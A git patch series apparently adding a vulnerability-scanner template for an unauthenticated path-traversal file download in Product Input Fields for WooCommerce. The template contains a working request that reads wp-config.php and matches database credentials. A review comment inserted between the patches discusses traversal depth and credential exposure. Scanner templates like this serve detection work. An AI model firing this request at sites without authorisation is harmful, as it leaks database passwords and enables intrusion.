From c9eaf79f28c9ec728723dfd56035c17def88161d Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Wed, 22 Sep 2021 07:34:09 +0900
Subject: [PATCH 1/3] Create product-input-fields-for-woocommerce-file-download.yaml
---
...-fields-for-woocommerce-file-download.yaml | 29 +++++++++++++++++++
1 file changed, 29 insertions(+)
create mode 100644 product-input-fields-for-woocommerce-file-download.yaml
diff --git a/product-input-fields-for-woocommerce-file-download.yaml b/product-input-fields-for-woocommerce-file-download.yaml
new file mode 100644
index 0000000000..5c4de213ce
--- /dev/null
+++ b/product-input-fields-for-woocommerce-file-download.yaml
@@ -0,0 +1,29 @@
+id: product-input-fields-for-woocommerce-file-download
+
+info:
+  name: Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download
+  author: 0x_Akoko
+  severity: high
+  tags: wordpress,woocommerce,lfi
+  description: The lack of authorisation checks in the handle_downloads() function, hooked to admin_init() could allow unauthenticated users to download arbitrary files from the blog using a path traversal payload.
+  reference:
+    - https://wpscan.com/vulnerability/15f345e6-fc53-4bac-bc5a-de898181ea74
+    - https://blog.nintechnet.com/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce/
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200
From dfa85833e27ed12b3cf144675ac2fae6726f4334 Mon Sep 17 00:00:00 2001
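Review bot: The `path` line hard-codes exactly five `../` segments with no comment saying which base directory they are counted from; because a traversal that over- or under-shoots the WordPress root lands on a non-existent file, the template silently reports clean on any install where the plugin's base path (the description only says `handle_downloads()` builds it) sits at a different depth. A comment above the path such as `# five ../ assumes the plugin resolves alg_wc_pif_download_file relative to its own upload subdirectory — confirm against the plugin source and add further depths if that varies` would make the assumption reviewable, and listing one or two additional depths as extra `path` entries is cheap if the base is not fixed. Note also that a positive hit pulls the target's live database credentials into the scan output (the matcher keys on `DB_PASSWORD`), so a comment above `matchers:` warning operators not to retain raw responses from this template would be a worthwhile caveat. The `lfi` tag is also a mislabel for what is an arbitrary file download via path traversal rather than a file inclusion, unless the template repository deliberately uses `lfi` for both.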
From: sandeep
Date: Wed, 22 Sep 2021 18:18:21 +0530
Subject: [PATCH 2/3] misc update
---
.../wordpress/wp-woocommerce-file-download.yaml | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename product-input-fields-for-woocommerce-file-download.yaml => vulnerabilities/wordpress/wp-woocommerce-file-download.yaml (100%)
diff --git a/product-input-fields-for-woocommerce-file-download.yaml b/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml
similarity index 100%
rename from product-input-fields-for-woocommerce-file-download.yaml
rename to vulnerabilities/wordpress/wp-woocommerce-file-download.yaml
From a898a6c3a646bd2a2830996ba94dad569bef2f10 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Wed, 22 Sep 2021 18:19:25 +0530
Subject: [PATCH 3/3] Update wp-woocommerce-file-download.yaml
---
vulnerabilities/wordpress/wp-woocommerce-file-download.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml b/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml
index 5c4de213ce..13aeedf332 100644
--- a/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml
+++ b/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml
@@ -1,4 +1,4 @@ -id: product-input-fields-for-woocommerce-file-download +id: wp-woocommerce-file-download info: name: Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download